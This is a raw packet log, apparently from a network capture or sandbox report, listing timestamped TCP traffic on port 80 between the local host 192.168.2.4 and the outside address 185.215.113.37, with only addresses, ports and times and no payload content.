Oct 3, 2024 18:38:13.602857113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602880955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602896929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602911949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602925062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.602925062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.602927923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602941990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.602946043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602952957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.603018045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.603034973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.603828907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.603846073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.603861094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.603876114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.603879929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.603890896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.603904963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.603931904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.616695881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.616719961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.616739035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.616765022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.616781950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.617151022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.617166996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.617183924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.617198944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.617199898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.617212057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.617230892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.617243052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.617695093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.617712021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.617728949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.617742062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.617742062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.617753029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.617774963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.617796898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.618339062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.618355989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.618371010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.618386030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.618387938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.618401051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.618422031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.618436098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.618997097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.619013071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.619029045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.619044065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.619045973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.619055986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.619077921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.619088888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.619879961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.619904995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.619920015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.619930029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.619935989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.619944096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.619955063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.619961977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.619978905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.619997025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.621010065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.621081114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.621083975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.621118069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.621134996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.621154070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.621166945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.621187925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.621201038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.621237040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.621949911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.621985912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.622001886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.622020006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.622037888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.622056007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.622066975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.622091055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.622107029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.622136116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.622720957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.622756004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.622773886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.622791052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.622806072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.622826099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.622836113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.622872114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.623512983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.623567104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.623567104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.623600960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.623615980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.623636007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.623647928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.623670101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.623682022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.623716116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.663116932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.663168907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.663177013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.663213015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.663214922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.663258076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.663424969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.663460016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.663475037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.663496017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.663506031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.663536072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.663542032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.663579941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.684493065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.684619904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.684624910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.684664965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.684675932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.684700012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.684711933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.684736967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.684746981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.684772968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.684782982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.684811115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.684818029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.684858084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.685410976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.685446024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.685460091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.685482979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.685493946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.685519934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.685528994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.685564995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.686124086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.686158895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.686173916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.686193943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.686208010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.686229944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.686235905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.686263084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.686275005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.686310053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.687078953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.687114954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.687136889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.687150955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.687163115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.687186003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.687197924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.687232018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.687832117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.687868118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.687885046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.687903881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.687915087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.687938929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.687949896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.687973022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.687983990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.688018084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.688693047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.688728094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.688740015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.688765049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.688774109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.688801050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.688810110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.688834906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.688846111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.688882113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.689562082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.689598083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.689610958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.689630985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.689642906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.689666033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.689675093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.689702034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.689713955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.689752102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.690481901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.690517902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.690532923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.690547943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.690565109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.690582991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.690598011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.690618038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.690629959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.690664053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.691373110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.691431046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.691447020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.691479921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.691494942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.691515923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.691526890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.691545963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.691561937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.691581011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.691596031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.691627026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.692008972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.692025900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.692042112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.692058086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.692074060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.692080975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.692092896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.692117929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.692909002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.692925930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.692943096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.692959070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.692966938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.692977905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.692990065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.692995071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.693001986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.693018913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.693030119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.693887949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.693905115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.693922043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.693937063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.693942070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.693954945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.693969965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.693979979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.693990946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.694767952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.694786072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.694801092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.694816113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.694823980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.694833040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.694839954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.694849968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.694852114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.694873095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.694894075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.695557117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.695574045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.695590019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.695605993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.695614100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.695631027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.695646048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.710850954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.710958004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.711040974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.711057901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.711091042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.711111069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.711155891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.711173058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.711191893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.711203098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.711209059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.711215019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.711239100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.711252928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.711746931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.711762905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.711800098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.711815119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.712114096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.712129116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.712146044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.712162018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.712168932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.712178946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.712179899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.712208986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.712224960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.713258028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.713275909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.713291883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.713309050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.713309050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.713324070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.713325024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.713341951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.713342905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.713352919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.713376999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.713386059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.714168072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.714184046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.714199066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.714215040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.714215994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.714231968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.714235067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.714246035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.714263916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.714273930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.715078115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.715095043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.715111017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.715126038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.715127945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.715146065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.715152979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.715162039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.715166092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.715190887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.715200901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.716104031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.716121912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.716139078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.716150045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.716166019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.716176033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.753056049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.753134012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.753139973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.753222942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.753243923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.753269911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.753319979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.753354073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.753376007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.753388882 CEST	80	49730	185.215.113.37	192.168.2.4
